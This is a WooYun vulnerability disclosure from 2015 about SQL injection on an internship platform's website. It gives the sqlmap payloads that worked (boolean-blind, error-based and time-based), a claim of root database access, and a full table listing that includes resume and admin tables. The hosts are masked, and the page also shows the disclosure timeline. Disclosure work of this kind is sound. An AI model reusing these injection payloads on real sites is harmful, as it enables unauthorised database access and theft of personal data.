当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150885

漏洞标题:刺猬实习主站SQL注入漏洞

相关厂商:刺猬实习

漏洞作者: 路人甲

提交时间:2015-11-01 20:33

修复时间:2015-12-20 14:50

公开时间:2015-12-20 14:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-01: 细节已通知厂商并且等待厂商处理中
2015-11-05: 厂商已经确认,细节仅向厂商公开
2015-11-15: 细节向核心白帽子及相关领域专家公开
2015-11-25: 细节向普通白帽子公开
2015-12-05: 细节向实习白帽子公开
2015-12-20: 细节向公众公开

简要描述:

刺猬,是不是碰不得

详细说明:

注入点:

http://**.**.**.**/index.php?s=/Index/jobinfo/id/868.html


URI伪静态注入,ID可注入
http://**.**.**.**/index.php?s=/Index/jobinfo/id/868*.html 放入SQLMAP跑起

Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/index.php?s=/Index/jobinfo/id/868' AND 7369=7369 AND 'ppRe'='ppRe.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://**.**.**.**:80/index.php?s=/Index/jobinfo/id/868' AND (SELECT 2793 FROM(SELECT COUNT(*),CONCAT(0x71717a6b71,(SELECT (ELT(2793=2793,1))),0x71767a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NpOU'='NpOU.html
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://**.**.**.**:80/index.php?s=/Index/jobinfo/id/868' AND (SELECT * FROM (SELECT(SLEEP(5)))AidI) AND 'cqox'='cqox.html
---


root权限

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sxbcms
[*] test


75张表

Database: sxbcms
[75 tables]
+------------------------------+
| hr_access |
| hr_action |
| hr_action_20150922 |
| hr_activity |
| hr_activity_exam_coupons |
| hr_activity_exam_results |
| hr_activity_passthrough_list |
| hr_activity_signup |
| hr_admin |
| hr_admin_member |
| hr_banner |
| hr_bannerclass |
| hr_cache_key |
| hr_checkcode |
| hr_city |
| hr_class |
| hr_comment |
| hr_company |
| hr_company_20150922 |
| hr_company_article |
| hr_companyarticle |
| hr_companyarticle_20150922 |
| hr_companyshow |
| hr_contactus |
| hr_detail |
| hr_email_validation |
| hr_favorite |
| hr_favorite_20150922 |
| hr_feedback |
| hr_feedback_20150922 |
| hr_group |
| hr_home_cooperation |
| hr_home_feedback |
| hr_interviewnotice |
| hr_interviewnotice_20150922 |
| hr_job |
| hr_job_20150922 |
| hr_label |
| hr_label_20150922 |
| hr_links |
| hr_member |
| hr_message |
| hr_message_20150922 |
| hr_news |
| hr_newsclass |
| hr_node |
| hr_offer |
| hr_ourstory |
| hr_price |
| hr_resume |
| hr_resume_certificate |
| hr_resume_education |
| hr_resume_intention |
| hr_resume_screen |
| hr_resume_workexp |
| hr_role |
| hr_role_admin |
| hr_send_email_task |
| hr_send_sms_task |
| hr_shixi_resume |
| hr_student |
| hr_student_20150922 |
| hr_student_certificate |
| hr_studentarticle |
| hr_studentarticle_20150922 |
| hr_studentshow |
| hr_sysinfo |
| hr_tip_email |
| hr_tuijian |
| hr_user |
| hr_userclass |
| hr_users |
| hr_users_20150922 |
| hr_weixin_user |
| hr_zhaopin |
+------------------------------+

漏洞证明:

Database: sxbcms
[75 tables]
+------------------------------+
| hr_access |
| hr_action |
| hr_action_20150922 |
| hr_activity |
| hr_activity_exam_coupons |
| hr_activity_exam_results |
| hr_activity_passthrough_list |
| hr_activity_signup |
| hr_admin |
| hr_admin_member |
| hr_banner |
| hr_bannerclass |
| hr_cache_key |
| hr_checkcode |
| hr_city |
| hr_class |
| hr_comment |
| hr_company |
| hr_company_20150922 |
| hr_company_article |
| hr_companyarticle |
| hr_companyarticle_20150922 |
| hr_companyshow |
| hr_contactus |
| hr_detail |
| hr_email_validation |
| hr_favorite |
| hr_favorite_20150922 |
| hr_feedback |
| hr_feedback_20150922 |
| hr_group |
| hr_home_cooperation |
| hr_home_feedback |
| hr_interviewnotice |
| hr_interviewnotice_20150922 |
| hr_job |
| hr_job_20150922 |
| hr_label |
| hr_label_20150922 |
| hr_links |
| hr_member |
| hr_message |
| hr_message_20150922 |
| hr_news |
| hr_newsclass |
| hr_node |
| hr_offer |
| hr_ourstory |
| hr_price |
| hr_resume |
| hr_resume_certificate |
| hr_resume_education |
| hr_resume_intention |
| hr_resume_screen |
| hr_resume_workexp |
| hr_role |
| hr_role_admin |
| hr_send_email_task |
| hr_send_sms_task |
| hr_shixi_resume |
| hr_student |
| hr_student_20150922 |
| hr_student_certificate |
| hr_studentarticle |
| hr_studentarticle_20150922 |
| hr_studentshow |
| hr_sysinfo |
| hr_tip_email |
| hr_tuijian |
| hr_user |
| hr_userclass |
| hr_users |
| hr_users_20150922 |
| hr_weixin_user |
| hr_zhaopin |
+------------------------------+


另外,网站还存在诸多SQL注入
1、http://**.**.**.**/index.php?s=/Index/jobinfo/id/1129.html
像这类带ID的基本都可注入
2、http://**.**.**.**/index.php?p=1&s=%2FIndex%2Fsearch.html&jobtype=&city=&keyword=
首页搜索处可SQL注入
未进一步注册登录测试,应该还存在注入

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-05 14:49

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无